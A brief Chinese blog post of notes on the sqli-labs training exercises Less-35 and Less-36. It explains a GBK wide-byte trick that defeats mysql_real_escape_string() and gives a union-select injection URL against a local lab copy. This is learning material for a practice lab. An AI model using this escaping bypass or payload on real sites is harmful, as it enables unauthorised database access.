Less35、Less36【无闭合注入，mysql_real_escape_string()】

Less35无闭合符号，直接进行注入

Less36

less36中函数mysql_real_escape_string()对特殊字符进行过滤

\x00

\x1a

因为mysql没有设置成gbk，所以mysql_real_escape_string()可以突破

http://127.0.0.1:666/sqli-labs/Less-36/?id=?id=-1%df%27%20union%20select%201,2,3--+

posted @ 2020-11-06 10:48 峰中追风阅读(130) 评论(0) 编辑收藏举报

刷新页面返回顶部

阿俄菲格Tempt